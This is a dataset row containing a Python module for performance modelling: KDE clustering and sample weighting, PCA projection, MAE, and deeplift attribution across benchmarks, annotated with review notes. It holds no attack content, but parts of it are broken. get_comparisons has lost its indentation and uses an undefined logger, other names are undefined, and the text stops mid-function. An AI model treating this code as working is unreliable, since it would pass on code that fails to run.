seq_id string | text string | repo_name string | sub_path string | file_name string | file_ext string | file_size_in_byte int64 | program_lang string | lang string | doc_type string | stars int64 | dataset string | pt string | api list |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
34677552243 | import logging
import numpy as np
from ComperfModelling import predict_from_model
def run_kernel_density_estimation(values, normalised=False, normalisation_statistic=0):
    """Fit a Gaussian kernel density estimate over *values*.

    Args:
        values: array of response values; reshaped to (n, 1) as required by
            scikit-learn's KernelDensity.
        normalised: if True, the fixed bandwidth/evaluation gap (expressed in
            raw cycles) are rescaled by *normalisation_statistic* so they
            match the normalised value range.
        normalisation_statistic: divisor used to rescale the bandwidth and
            evaluation gap when *normalised* is True; must be non-zero then.

    Returns:
        (kde, bandwidth, evaluation_gap): the fitted KernelDensity model and
        the (possibly rescaled) bandwidth and evaluation grid step.

    Raises:
        ValueError: if *normalised* is True but *normalisation_statistic* is
            0 (previously surfaced as an opaque ZeroDivisionError).
    """
    values = values.reshape(-1, 1)
    # What should bandwidth be? Add as part of experiment configuration?
    bandwidth = 100000
    evaluation_gap = 50000
    if normalised:
        # BUG FIX: guard the division — the default statistic is 0.
        if normalisation_statistic == 0:
            raise ValueError("normalisation_statistic must be non-zero when normalised=True")
        bandwidth = float(bandwidth) / normalisation_statistic
        evaluation_gap = float(evaluation_gap) / normalisation_statistic
    # NOTE(review): KernelDensity is not imported at module level in this
    # file; import locally so the dependency is explicit. TODO: confirm
    # scikit-learn is a declared dependency of this project.
    from sklearn.neighbors import KernelDensity
    kde = KernelDensity(kernel='gaussian', bandwidth=bandwidth).fit(values)
    return kde, bandwidth, evaluation_gap
def compute_sample_weights_from_kde(kde, values, normalised=False, normalisation_statistic=0.0):
    """Compute a per-example sample weight as the inverse KDE density.

    It is very expensive to evaluate the KDE at every single example, so the
    examples are binned (bin width equals the KDE bandwidth) and the same
    weight is applied to all examples within a given bin.

    Args:
        kde: fitted density model exposing ``score_samples`` (log-density).
        values: array of response values to weight.
        normalised: if True, the raw-cycle bin size is rescaled by
            *normalisation_statistic* to match the normalised value range.
        normalisation_statistic: divisor applied to the bin size when
            *normalised* is True.

    Returns:
        Array of sample weights aligned with *values*: weight = 1/density,
        capped at 10 for bins whose density is below 0.1.
    """
    range_max = np.amax(values)
    range_min = np.amin(values)
    # Making the bin size equal to the bandwidth of the KDE
    bin_size = 100000
    if normalised:
        bin_size = bin_size / normalisation_statistic
    # BUG FIX: guard against a value range narrower than one bin, which
    # previously produced 0 bins (an empty evaluation grid and a bins-1 == -1
    # index into it).
    bins = max(int((float(range_max) - range_min) / float(bin_size)), 1)
    bin_positions = np.linspace(range_min, range_max, bins) + (bin_size / 2.0)  # i.e. evaluate the middle of each bin
    density_estimations = np.exp(kde.score_samples(bin_positions.reshape(-1, 1)))
    # clip density estimations for bins that very likely don't contain any
    # examples, as otherwise sample weights explode
    density_estimations[density_estimations < 0.1] = np.nan
    sample_weights = np.reciprocal(density_estimations)
    sample_weights[np.isnan(sample_weights)] = 10
    # now, apply the correct weight to each original estimation_position
    estimation_position_corresponding_bins = ((values - range_min) / bin_size).astype(np.int32)
    estimation_position_corresponding_bins[estimation_position_corresponding_bins >= bins] = bins - 1
    per_example_sample_weights = sample_weights[estimation_position_corresponding_bins]
    logging.debug("Clipped %d examples to have a maximum sample weight of 10",
                  len(per_example_sample_weights[per_example_sample_weights == 10]))
    return per_example_sample_weights
def kde_clustering_get_indexes(values, normalised=False, normalisation_statistic=0):
    """Cluster *values* by the local minima of their kernel density estimate.

    The density is evaluated on a regular grid; local minima of the density
    separate adjacent clusters.

    Args:
        values: array of response values (e.g. durations) to cluster.
        normalised, normalisation_statistic: forwarded to
            run_kernel_density_estimation to rescale bandwidth and grid step.

    Returns:
        (kde, cluster_indexes, cluster_bounds): the fitted KDE, a list of
        index arrays (one per non-empty cluster, indexing into *values*) and
        the matching [lower, upper) bounds. Returns (None, [], []) when the
        value range is too narrow to cluster meaningfully.
    """
    # NOTE(review): argrelextrema is not imported at module level in this
    # file; import locally so the dependency is explicit.
    from scipy.signal import argrelextrema
    counts = values.reshape(-1, 1)
    kde, bandwidth, evaluation_gap = run_kernel_density_estimation(counts, normalised, normalisation_statistic)
    # BUG FIX: int() was previously applied to the numerator only, so
    # num_divisions was a float and np.linspace(num=float) raises TypeError.
    num_divisions = int((np.amax(counts) - np.amin(counts)) / evaluation_gap)
    if num_divisions < 20:
        # i.e. if we evaluate the density at less than this number of
        # divisions, then we can't possibly cluster...
        return None, [], []
    estimation_positions = np.linspace(np.amin(counts), np.amax(counts), num_divisions)
    estimation_positions = estimation_positions.reshape(-1, 1)
    estimations = np.exp(kde.score_samples(estimation_positions))
    # form a minimum by starting at 1.0 then descending to 0.0, then
    # continuing with the histogram
    estimations = np.insert(estimations, 0, 0.0, axis=0)
    estimation_positions = np.insert(estimation_positions, 0, np.amin(counts) - evaluation_gap, axis=0)
    estimations = np.insert(estimations, 0, 1.0, axis=0)
    estimation_positions = np.insert(estimation_positions, 0, np.amin(counts) - (2 * evaluation_gap), axis=0)
    # Local minima of the density separate the clusters (the maxima computed
    # by the original code were unused and have been dropped).
    mi = argrelextrema(estimations, np.less_equal)[0]
    cluster_indexes = []
    cluster_bounds = []
    for idx in np.arange(1, len(mi)):
        lower_bound = estimation_positions[mi[idx - 1]]
        if idx == (len(mi) - 1):
            # Last cluster: extend past the maximum so the top value is included.
            upper_bound = np.amax(counts) + 1
        else:
            upper_bound = estimation_positions[mi[idx]]
        clustered_task_indexes = np.where(np.logical_and(counts >= lower_bound, counts < upper_bound))[0]
        if len(clustered_task_indexes) > 0:
            cluster_indexes.append(clustered_task_indexes)
            cluster_bounds.append([lower_bound, upper_bound])
    return kde, cluster_indexes, cluster_bounds
"""
This function aims to identify significant differences between the responses, and saving the examples to later investigate as a comparative study
A comparison may be between individual tasks or two task sets, where we necessarily average the latter
"""
def get_comparisons(responses):
# should also save the cluster details so we can later use them to repeat the equivalent analysis on separate testing sets
individual_comparisons = []
cluster_comparisons = []
cluster_comparison_bounds = []
central_cluster_indexes = []
central_cluster_bounds = []
individual_comparisons = []
cluster_comparisons = []
kde = None
# return a list of pairs, where each element is a list of task indexes to compare against eachother
# return two types of comparisons: closest-to-mean task, tasks within 1*std-deviation of mean
kde, clustered_task_indexes, cluster_bounds = kde_clustering_get_indexes(responses)
if kde is None:
log.info("Could not cluster instances as there is no significant variation.")
return central_cluster_indexes, central_cluster_bounds, individual_comparisons, cluster_comparisons, kde
# filter to only the significant clusters?
large_clusters = []
minimum_cluster_size = max([int(0.01*len(responses)),10])
for cluster_idx, cluster_indexes in enumerate(clustered_task_indexes):
if len(cluster_indexes) >= minimum_cluster_size:
large_clusters.append(cluster_idx)
logging.info("Found %d significant clusters (minimum cluster size was: %d)", len(large_clusters), minimum_cluster_size)
clustered_task_indexes = [cluster_indexes for cluster_idx, cluster_indexes in enumerate(clustered_task_indexes) if cluster_idx in large_clusters]
cluster_bounds = [cluster_indexes for cluster_idx, cluster_indexes in enumerate(cluster_bounds) if cluster_idx in large_clusters]
if len(clustered_task_indexes) < 2:
logging.info("There were fewer than two clusters, so cannot do a comparative analysis")
return central_cluster_indexes, central_cluster_bounds, individual_comparisons, cluster_comparisons, kde
fast_cluster = clustered_task_indexes[0]
slow_clusters = clustered_task_indexes[1:]
fast_durations = responses[fast_cluster]
mean_fast_task_idx = (np.abs(fast_durations - np.mean(fast_durations))).argmin()
mean_fast_task_idx_original_set = fast_cluster[mean_fast_task_idx]
constraint_coefficient = 0.5
fast_lower_central_bound = np.mean(fast_durations) - constraint_coefficient * np.std(fast_durations)
fast_upper_central_bound = np.mean(fast_durations) + constraint_coefficient * np.std(fast_durations)
central_fast_task_idxs = np.where(np.logical_and(fast_durations>=fast_lower_central_bound, fast_durations<=fast_upper_central_bound))[0]
fast_durations_within_constraint = fast_durations[central_fast_task_idxs].flatten()
distances_from_mean = np.absolute(fast_durations_within_constraint - np.mean(fast_durations))
distances_sorted_indexes = np.argsort(distances_from_mean)
# now filter the central indexes to only those that are within the bounds and are the closest to mean
central_fast_task_idxs = central_fast_task_idxs[distances_sorted_indexes[:50]]
# update the bounds
fast_lower_central_bound = np.amin(fast_durations[central_fast_task_idxs])
fast_upper_central_bound = np.amax(fast_durations[central_fast_task_idxs])
central_fast_task_idxs_original_set = fast_cluster[central_fast_task_idxs]
central_cluster_bounds = []
central_cluster_bounds.append([fast_lower_central_bound, fast_upper_central_bound])
central_cluster_indexes = []
central_cluster_indexes.append(central_fast_task_idxs_original_set)
for slow_cluster_idx, slow_cluster in enumerate(slow_clusters):
slow_durations = responses[slow_cluster]
mean_slow_task_idx = (np.abs(slow_durations - np.mean(slow_durations))).argmin()
mean_slow_task_idx_original_set = slow_cluster[mean_slow_task_idx]
lower_central_bound = np.mean(slow_durations) - constraint_coefficient * np.std(slow_durations)
upper_central_bound = np.mean(slow_durations) + constraint_coefficient * np.std(slow_durations)
central_slow_task_idxs = np.where(np.logical_and(slow_durations>=lower_central_bound, slow_durations<=upper_central_bound))[0]
central_slow_task_idxs_original_set = slow_cluster[central_slow_task_idxs]
slow_durations_within_constraint = slow_durations[central_slow_task_idxs].flatten()
slow_distances_from_mean = np.absolute(slow_durations_within_constraint - np.mean(slow_durations))
slow_distances_sorted_indexes = np.argsort(slow_distances_from_mean)
# now filter the central indexes to only those that are within the bounds and are the closest to mean
central_slow_task_idxs = central_slow_task_idxs[slow_distances_sorted_indexes[:50]]
central_slow_task_idxs_original_set = slow_cluster[central_slow_task_idxs]
# update the bounds
lower_central_bound = np.amin(slow_durations[central_slow_task_idxs])
upper_central_bound = np.amax(slow_durations[central_slow_task_idxs])
individual_comparisons.append([mean_fast_task_idx_original_set, mean_slow_task_idx_original_set])
central_cluster_bounds.append([lower_central_bound, upper_central_bound])
central_cluster_indexes.append(central_slow_task_idxs_original_set)
cluster_comparisons.append([0,slow_cluster_idx+1])
return central_cluster_indexes, central_cluster_bounds, individual_comparisons, cluster_comparisons, kde
def run_pca_transformation(taskset, pca):
    """Project a taskset's input features onto the given PCA components.

    Args:
        taskset: sequence whose element [1] is the (n_examples, n_events)
            feature matrix; other elements are passed through untouched.
        pca: object exposing ``components_`` of shape
            (n_components, n_events).

    Returns:
        A new tuple with element [1] replaced by the projected features.

    BUG FIX: this function previously built the transformed tuple in a local
    variable and returned None, so it had no observable effect at all
    (callers that ignored the return value saw no transformation). It now
    returns the transformed taskset; callers should rebind, i.e.
    ``taskset = run_pca_transformation(taskset, pca)``.
    """
    taskset = list(taskset)
    # Projected feature k of example i is sum_d x[i, d] * components_[k, d].
    taskset[1] = np.array([sum((taskset[1][i] * np.array(pca.components_[:])).transpose()) for i in range(len(taskset[1]))])
    return tuple(taskset)
def run_sample_weighting_and_pca_transformation(
        training_taskset,
        validation_taskset,
        testing_taskset,
        should_standardise,
        pca_transform,
        training_event_stats):
    """Derive KDE-based sample weights for all three splits, then attempt a
    PCA projection of their input features.

    Args:
        training_taskset, validation_taskset, testing_taskset: taskset
            tuples; element [1] is the input-event matrix, element [2] the
            responses.
        should_standardise: forwarded as `normalised` to the KDE helpers.
        pca_transform: if True, fit a real sklearn PCA on the training
            inputs; otherwise build an identity component matrix so
            downstream code can treat both cases uniformly.
        training_event_stats: per-event statistics;
            training_event_stats[-1][1] (the response entry) is used as the
            KDE normalisation statistic.

    Returns:
        (training_taskset, validation_taskset, testing_taskset,
        training_sample_weights, validation_sample_weights,
        testing_sample_weights, pca)
    """
    training_responses = training_taskset[2]
    validation_responses = validation_taskset[2]
    testing_responses = testing_taskset[2]
    # Build the kwargs dict once and re-use it: the KDE is fitted on the
    # TRAINING responses only, then every split is weighted against that
    # same density model.
    kde_params = {}
    kde_params["normalised"] = should_standardise
    kde_params["normalisation_statistic"] = training_event_stats[-1][1]
    kde_params["values"] = training_responses
    kde, _, _ = run_kernel_density_estimation(**kde_params)
    kde_params["kde"] = kde
    training_sample_weights = compute_sample_weights_from_kde(**kde_params)
    kde_params["values"] = validation_responses
    validation_sample_weights = compute_sample_weights_from_kde(**kde_params)
    kde_params["values"] = testing_responses
    testing_sample_weights = compute_sample_weights_from_kde(**kde_params)
    num_input_events = len(training_taskset[1][0])
    if pca_transform == True:
        from sklearn.decomposition import PCA
        pca = PCA(n_components=num_input_events)
        # Only the fit matters here; the transformed return value is
        # discarded because the projection is applied separately below.
        pca.fit_transform(training_taskset[1])
    else:
        # NOTE(review): pca_struct is not defined anywhere in this module —
        # this branch raises NameError unless it is provided elsewhere;
        # TODO confirm.
        pca = pca_struct()
        pca.components_ = np.identity(num_input_events)
    # NOTE(review): run_pca_transformation (defined above) does not mutate
    # its argument in place, and its result is discarded here, so the
    # tasksets returned below are NOT actually projected — this looks like a
    # latent bug; confirm intent.
    run_pca_transformation(training_taskset, pca)
    run_pca_transformation(validation_taskset, pca)
    run_pca_transformation(testing_taskset, pca)
    return training_taskset, validation_taskset, testing_taskset, training_sample_weights, validation_sample_weights, testing_sample_weights, pca
def calculate_mae(models, testing_taskset):
    """Return the mean of each model's mean-absolute-error on the test set.

    The taskset layout is (meta, examples, responses, ...); column 0 of the
    responses holds the true values.
    """
    examples = testing_taskset[1]
    true_responses = testing_taskset[2][:, 0]
    n = float(len(true_responses))
    per_model_maes = [
        np.sum(np.absolute(predict_from_model(model.model_file, examples) - true_responses)) / n
        for model in models
    ]
    return np.mean(per_model_maes)
def get_analysis_tasksets_for_configuration(
        dataset,
        all_events,
        pca_component_struct,
        taskset_kwargs
        ):
    """Fetch the three taskset views used by the comparative analysis.

    Args:
        dataset: object exposing ``get_taskset(**kwargs) -> (taskset, _, _)``.
        all_events: full event list substituted into *taskset_kwargs* for the
            destandardised view.
        pca_component_struct: object with a ``components_`` matrix.
        taskset_kwargs: keyword arguments for dataset.get_taskset. NOTE:
            this dict is mutated in place below ("input_events",
            "standardised"), which the caller will observe after the call.

    Returns:
        (taskset, taskset_fs, taskset_all_events_fs_destandardised)
    """
    # Which configuration to get from the dataset is within the "benchmark_id" kwarg
    taskset, _, _ = dataset.get_taskset(**taskset_kwargs)
    # NOTE(review): run_pca_transformation (defined above) does not mutate
    # its argument in place, and its result is discarded here, so `taskset`
    # is returned untransformed — confirm whether the projection was
    # intended to apply.
    run_pca_transformation(taskset, pca_component_struct)
    taskset_fs, _, _ = dataset.get_taskset(**taskset_kwargs) # No pca transformation here
    taskset_kwargs["input_events"] = all_events
    taskset_kwargs["standardised"] = False
    taskset_all_events_fs_destandardised, _, _ = dataset.get_taskset(**taskset_kwargs) # No pca transformation here
    return taskset, taskset_fs, taskset_all_events_fs_destandardised
def analyse_tasks_across_benchmarks(models,
        testing_tasksets, # array of length two, for two sets of tasks to compare to eachother
        scores,
        predicted_responses,
        std_devs,
        reference_responses,
        true_responses,
        reference_benchmark_idx, # i.e. what index of testing_tasksets is the reference
        reference_strategy="minimum_predicted_response",
        reference_indexes=None,
        just_get_values=False # If True, then deeplift won't be invoked at all, and all produced contributions/coefficients will be 0
        ):
    """For each model, pick a reference example from the reference benchmark
    and attribute (via deeplift) the behaviour of every target-benchmark
    example against it.

    The scores/predicted_responses/std_devs/true_responses accumulators may
    be passed as None on the first call; they are created and grown here and
    returned so they can be fed back in across calls.

    Returns:
        (scores, predicted_responses, std_devs, reference_responses,
        true_responses) with this call's results appended; scores is indexed
        as [label_rank][event_idx] -> list of scores, one per model.

    BUG FIXES relative to the original:
      * removed the unused leading ``self`` parameter — this is a
        module-level function and the in-file caller (performance_comparison)
        already invokes it without one, which silently shifted every
        positional argument by one;
      * ``reference_indexes`` no longer uses a mutable default list shared
        across calls;
      * ``reference_responses == None`` replaced with ``is None`` (``==``
        against an array value would be ambiguous);
      * the accumulator-extension arithmetic computed a non-positive
        ``difference`` and under-extended the lists, causing an IndexError.

    NOTE(review): ``backend``/``tf`` (keras backend / tensorflow),
    ``keras_model`` and ``run_deeplift_comparison`` are not defined in this
    module — presumably imported or injected elsewhere; TODO confirm.
    """
    if reference_indexes is None:
        reference_indexes = []
    # The single non-reference benchmark index.
    target_benchmark_idx = [benchmark_idx for benchmark_idx in range(len(testing_tasksets)) if benchmark_idx != reference_benchmark_idx][0]
    if just_get_values:
        models = [0] # We don't need the models if we just want to get the value variations, but we do need an element in the list
    else:
        backend.set_floatx('float32')
        backend.set_learning_phase(False) # this is some keras funkery when using models with backend: https://github.com/fchollet/keras/issues/2310
        config = tf.ConfigProto()
        config.gpu_options.allow_growth = True
        backend.set_session(tf.Session(config=config))
    reference_example_idx = -1
    for model in models:
        if just_get_values:
            # Dummy all-zero reference and results: only the value
            # variations are wanted, so no model is consulted.
            reference_example = np.zeros(len(testing_tasksets[reference_benchmark_idx][1][0])).tolist()
            reference_response = 0.0
            deeplift_results = np.array([[0.0 for event in reference_example] for task in testing_tasksets[target_benchmark_idx][1]])
            model_reference_predictions = np.array([0.0 for task in testing_tasksets[target_benchmark_idx][1]])
            model_target_predictions = np.array([0.0 for task in testing_tasksets[target_benchmark_idx][1]])
            if reference_responses is None:
                reference_responses = [reference_response]
            else:
                reference_responses.append(reference_response)
            reference_example_idx = 0
            reference_indexes.append(reference_example_idx)
        else:
            model_reference_predictions = predict_from_model(model.model_file, testing_tasksets[reference_benchmark_idx][1])
            model_target_predictions = predict_from_model(model.model_file, testing_tasksets[target_benchmark_idx][1])
            # If the comparison is between two groups of examples, which ones do we compare?
            # After this switch, we will have one reference example and one target example
            if reference_strategy == "minimum_predicted_response":
                reference_example_idx = np.argmin(model_reference_predictions)
                reference_example = testing_tasksets[reference_benchmark_idx][1][reference_example_idx]
                reference_response = model_reference_predictions[reference_example_idx]
            elif reference_strategy == "closest_to_mean_predicted_response":
                difference_from_mean = 9999999
                reference_example_idx = 0
                mean = np.mean(model_reference_predictions)
                for task_idx, duration in enumerate(model_reference_predictions):
                    if abs(mean - duration) < difference_from_mean:
                        difference_from_mean = abs(mean - duration)
                        reference_example_idx = task_idx
                reference_example = testing_tasksets[reference_benchmark_idx][1][reference_example_idx]
                reference_response = model_reference_predictions[reference_example_idx]
            elif reference_strategy == "minimum_true_response":
                reference_example_idx = np.argmin(testing_tasksets[reference_benchmark_idx][2])
                reference_example = testing_tasksets[reference_benchmark_idx][1][reference_example_idx]
                # NOTE(review): keras_model is undefined in this scope — this
                # strategy (and the two below) raise NameError if selected.
                reference_response = keras_model.predict(np.array([reference_example]))[:,0]
            elif reference_strategy == "minimum_example_inputs":
                reference_example = [np.amin(event_counts) for event_idx, event_counts in enumerate(testing_tasksets[reference_benchmark_idx][1].transpose())]
                reference_response = keras_model.predict(np.array([reference_example]))[:,0]
            elif reference_strategy == "zeros":
                reference_example = np.zeros(len(testing_tasksets[reference_benchmark_idx][1][0])).tolist()
                reference_response = keras_model.predict(np.array([reference_example]))[:,0]
            else:
                logging.error("Invalid reference strategy '%s'", reference_strategy)
                raise ValueError()
            if reference_responses is None:
                reference_responses = [reference_response]
            else:
                reference_responses.append(reference_response)
            del model_reference_predictions
            reference_indexes.append(reference_example_idx)
            target_example = testing_tasksets[target_benchmark_idx][1][0]
            # Now apply deeplift
            deeplift_results = run_deeplift_comparison(model.model_file,
                    target_example,
                    reference_example)
        # deeplift results is of format [task_idx][event_idx] = score
        # Aim to return a scores format of: [label_rank][input_event_idx] = list of scores, one per model
        if scores is None:
            # a list of scores for every task label and event
            scores = [[[] for event_idx in range(len(reference_example))] for i in list(range(int(np.amax(testing_tasksets[target_benchmark_idx][3]))))]
            # a list of predicted responses for every task label
            predicted_responses = [[] for i in list(range(int(np.amax(testing_tasksets[target_benchmark_idx][3]))))]
            # a list of input values for every task label and event
            std_devs = [[[] for event_idx in range(len(reference_example))] for i in list(range(int(np.amax(testing_tasksets[target_benchmark_idx][3]))))]
        add_true_responses = False
        if true_responses is None:
            add_true_responses = True
            true_responses = [[] for i in list(range(int(np.amax(testing_tasksets[target_benchmark_idx][3]))))]
        for task_idx, rank in enumerate(testing_tasksets[target_benchmark_idx][3]): # the true number of analysed tasks (we have scores for all)
            label_rank = int(rank)
            if label_rank >= len(scores):
                # BUG FIX: the original computed len(scores) - label_rank
                # (non-positive here), under-extending the accumulators and
                # indexing out of range below.
                difference = (label_rank - len(scores)) + 1
                for i in range(difference):
                    scores.append([[] for event_idx in range(len(reference_example))])
                    predicted_responses.append([])
                    std_devs.append([[] for event_idx in range(len(reference_example))])
                    if add_true_responses:
                        true_responses.append([])
            for event_idx, score in enumerate(deeplift_results[task_idx]):
                scores[label_rank][event_idx].append(score)
                std_devs[label_rank][event_idx].append(testing_tasksets[target_benchmark_idx][1][task_idx][event_idx])
            predicted_responses[label_rank].append(model_target_predictions[task_idx])
            if add_true_responses:
                true_responses[label_rank].append(testing_tasksets[target_benchmark_idx][2][task_idx])
    return scores, predicted_responses, std_devs, reference_responses, true_responses
def get_delta_values(
        tasksets,
        reference_benchmark_idx,
        reference_index):
    """Per-label, per-event deltas of target examples vs a reference example.

    Args:
        tasksets: list of taskset tuples; element [1] is the feature matrix
            and element [3] the per-example label rank.
        reference_benchmark_idx: which taskset holds the reference example;
            the single other taskset is the target.
        reference_index: row of the reference taskset to diff against.

    Returns:
        Nested lists indexed as [label_rank][event_idx] -> list of
        (target_value - reference_value) deltas.
    """
    target_benchmark_idx = [benchmark_idx for benchmark_idx in range(len(tasksets)) if benchmark_idx != reference_benchmark_idx][0]
    reference_example = tasksets[reference_benchmark_idx][1][reference_index]
    # Pre-size the accumulator for label ranks 0..max-1; it is extended on
    # demand below for any higher rank encountered.
    values = [[[] for event_idx in range(len(reference_example))] for i in list(range(int(np.amax(tasksets[target_benchmark_idx][3]))))]
    for task_idx, rank in enumerate(tasksets[target_benchmark_idx][3]):
        label_rank = int(rank)
        if label_rank >= len(values):
            # BUG FIX: the original computed len(values) - label_rank, which
            # is non-positive here, so the list was under-extended and
            # values[label_rank] raised an IndexError.
            difference = (label_rank - len(values)) + 1
            for i in range(difference):
                values.append([[] for event_idx in range(len(reference_example))])
        for event_idx in range(len(tasksets[target_benchmark_idx][1][task_idx])):
            values[label_rank][event_idx].append(tasksets[target_benchmark_idx][1][task_idx][event_idx] - reference_example[event_idx])
    return values
def performance_comparison(
        reference_taskset,
        reference_taskset_fs,
        reference_taskset_all_events_fs_destandardised,
        target_taskset,
        target_taskset_fs,
        target_taskset_all_events_fs_destandardised,
        models,
        training_event_stats,
        training_pca_matrix,
        linreg_coefficients_fs_des
        ):
    """Compare matched reference/target task instances and attribute the
    response variation to the input events.

    The performance comparison may operate as a 1-1 comparison, or a
    many-many comparison; in the latter case we average across multiple
    individual comparisons (all-all). Naming convention used throughout:
    "_fs" = feature space (pre-PCA), "_destandardised"/"destandardized" =
    raw units; no suffix = (standardised) PCA space.

    Returns:
        (average_contributions, average_linreg_contributions,
        average_coefficients, average_event_variations,
        average_all_event_variations, mean predicted-duration variation,
        mean true-duration variation)
    """
    linreg_contributions_across_comparisons = []
    contributions_across_comparisons = []
    coefficients_across_comparisons = []
    event_variations_across_comparisons = []
    all_event_variations_across_comparisons = []
    pred_duration_variations_across_comparisons = []
    true_duration_variations_across_comparisons = []
    # BUG FIX: the format string has two %d placeholders but only one
    # argument was previously supplied.
    logging.debug("For the performance comparison, there are %d reference examples and %d target examples.",
            len(reference_taskset[1]), len(target_taskset[1]))
    reference_instance_indexes_to_use_for_comparison = list(range(len(reference_taskset[1])))[:]
    # At the moment, all reference instances are compared to all target instances
    """
    num_reference_instances_to_use = 4 # TODO parameterise this arbitrary number!
    if len(reference_instance_indexes_to_use_for_comparison) > num_reference_instances_to_use:
        selection = np.random.choice(np.arange(len(reference_instance_indexes_to_use_for_comparison)),num_reference_instances_to_use,replace=False)
        reference_instance_indexes_to_use_for_comparison = np.array(reference_instance_indexes_to_use_for_comparison)[selection].tolist()
    """
    # For each reference example, compare it with the corresponding target example
    for reference_instance_idx in reference_instance_indexes_to_use_for_comparison:
        # Build a pseudo taskset containing the one reference example that we are comparing
        reference_taskset_temp = (reference_taskset[0], reference_taskset[1][[reference_instance_idx]], reference_taskset[2][[reference_instance_idx]], reference_taskset[3][[reference_instance_idx]])
        # Build a pseudo taskset containing the one target example that we are comparing
        target_instance_idx = np.where(target_taskset[3] == reference_taskset_temp[3][0])[0] # i.e. find the matching label
        target_taskset_temp = (target_taskset[0], target_taskset[1][[target_instance_idx]], target_taskset[2][[target_instance_idx]], target_taskset[3][[target_instance_idx]])
        # reference and target tasksets in FS (matched on the same label)
        reference_instance_idx_fs = np.where(reference_taskset_fs[3] == reference_taskset_temp[3][0])[0]
        target_instance_idx_fs = np.where(target_taskset_fs[3] == reference_taskset_temp[3][0])[0]
        reference_instance_idx_fs_all_events = np.where(reference_taskset_all_events_fs_destandardised[3] == reference_taskset_temp[3][0])[0]
        target_instance_idx_fs_all_events = np.where(target_taskset_all_events_fs_destandardised[3] == reference_taskset_temp[3][0])[0]
        target_taskset_fs_temp = (target_taskset_fs[0], target_taskset_fs[1][[target_instance_idx_fs]], target_taskset_fs[2][[target_instance_idx_fs]], target_taskset_fs[3][[target_instance_idx_fs]])
        reference_taskset_fs_temp = (reference_taskset_fs[0], reference_taskset_fs[1][[reference_instance_idx_fs]], reference_taskset_fs[2][[reference_instance_idx_fs]], reference_taskset_fs[3][[reference_instance_idx_fs]])
        comparison_tasksets = [reference_taskset_temp, target_taskset_temp]
        comparison_tasksets_fs = [reference_taskset_fs_temp, target_taskset_fs_temp]
        reference_indexes = []
        task_scores = None
        task_std_devs = None
        predicted_durations = None
        true_durations = None
        reference_response = None
        # TODO this function (and thus the surrounding code) is in need of significant refactoring!
        # NOTE(review): confirm these positional arguments line up with the
        # target signature — the definition above historically took a
        # leading `self` that this call never supplied.
        scores, predicted_durations_tmp, task_std_devs_tmp, reference_responses_tmp, true_durations_tmp = analyse_tasks_across_benchmarks(models,
                comparison_tasksets,
                task_scores,
                predicted_durations,
                task_std_devs,
                reference_response,
                true_durations,
                reference_benchmark_idx=0,
                reference_strategy="closest_to_mean_predicted_response",
                reference_indexes=reference_indexes)
        event_variations_fs = get_delta_values(comparison_tasksets_fs,
                reference_benchmark_idx=0,
                reference_index=reference_indexes[0])
        reference_example = reference_taskset_temp[1][reference_indexes[0]]
        reference_duration_true = reference_taskset_temp[2][reference_indexes[0]]
        reference_duration_pred = reference_responses_tmp[0]
        reference_example_all_events = reference_taskset_all_events_fs_destandardised[1][reference_instance_idx_fs_all_events]
        target_example_all_events = target_taskset_all_events_fs_destandardised[1][target_instance_idx_fs_all_events]
        # Per-label mean duration deltas (true and predicted), then rescaled
        # back to raw units via the response statistic.
        duration_variation_true = np.array([np.mean(the_durations) for task_idx, the_durations in enumerate(true_durations_tmp) if len(the_durations) > 0]) - reference_duration_true
        duration_variation_destandardised_true = (duration_variation_true * training_event_stats[-1][1])
        duration_variation_pred = np.array([np.mean(the_durations) for task_idx, the_durations in enumerate(predicted_durations_tmp) if len(the_durations) > 0]) - reference_duration_pred
        duration_variation_destandardised_pred = (duration_variation_pred * training_event_stats[-1][1])
        event_variations_fs = np.array([np.mean(delta_values, axis=1) for task_idx, delta_values in enumerate(event_variations_fs) if any(len(s) > 0 for s in delta_values)])
        event_variations_fs_destandardized = event_variations_fs * np.array(training_event_stats).transpose()[1].transpose()[:-1]
        event_variations = np.array([np.mean(the_inputs, axis=1) for task_idx, the_inputs in enumerate(task_std_devs_tmp) if any(len(s) > 0 for s in the_inputs)]) - reference_example
        all_event_variations = np.array([target_value - reference_value for reference_value, target_value in zip(reference_example_all_events, target_example_all_events)])
        scores_pc = np.array([np.mean(the_scores, axis=1) for task_idx, the_scores in enumerate(scores) if any(len(s) > 0 for s in the_scores)])
        # Per-event coefficients in PCA space (guarding against zero variation),
        # then mapped back to feature space and destandardised.
        coefficients_pc = np.divide(scores_pc, event_variations, out=np.zeros_like(scores_pc), where=event_variations!=0)
        coefficients_fs = np.matmul(coefficients_pc, training_pca_matrix.components_)
        coefficients_fs_destandardized = ((coefficients_fs * np.array(training_event_stats)[-1][1])) / np.array(training_event_stats).transpose()[1].transpose()[:-1]
        scores_fs = coefficients_fs * event_variations_fs
        scores_fs_destandardized = scores_fs * training_event_stats[-1][1]
        # Get the average over the compared examples (though there should only be one comparison here)
        average_scores = scores_fs_destandardized[0]
        average_coefficients = coefficients_fs_destandardized[0]
        average_values = event_variations_fs_destandardized[0]
        linreg_contributions = np.array(average_values) * linreg_coefficients_fs_des
        linreg_contributions_across_comparisons.append(linreg_contributions)
        # NOTE(review): configuration_idx and reference_benchmark_id are not
        # defined in this scope (NameError when this line is reached) — this
        # branch looks like a remnant of an outer loop from a refactor; TODO
        # resolve the intended condition.
        if configuration_idx == reference_benchmark_id:
            # Record the actual reference values so we can later reconstruct absolute counts from deltas if we want
            average_values = np.matmul(reference_example, training_pca_matrix.components_) * np.array(training_event_stats).transpose()[1].transpose()[:-1] + np.array(training_event_stats).transpose()[0][:-1]
            predicted_durations_destandardised = reference_duration_pred * np.array(training_event_stats[-1][1]) + training_event_stats[-1][0]
            duration_variation_destandardised_pred = predicted_durations_destandardised
            durations_destandardised = reference_duration_true * np.array(training_event_stats[-1][1]) + training_event_stats[-1][0]
            duration_variation_destandardised_true = durations_destandardised
        all_event_variations_across_comparisons.append(all_event_variations)
        contributions_across_comparisons.append(average_scores)
        coefficients_across_comparisons.append(average_coefficients)
        event_variations_across_comparisons.append(average_values)
        pred_duration_variations_across_comparisons.append(np.mean(duration_variation_destandardised_pred))
        true_duration_variations_across_comparisons.append(np.mean(duration_variation_destandardised_true))
    # And I need to get value variations for *all* events
    average_all_event_variations = np.mean(np.array(all_event_variations_across_comparisons), axis=0)[0]
    # Now I have the computed data for all the comparisons between the reference set and target set
    # NOTE(review): axis=1 here differs from the axis=0 used for every other
    # aggregate below — confirm this is intended.
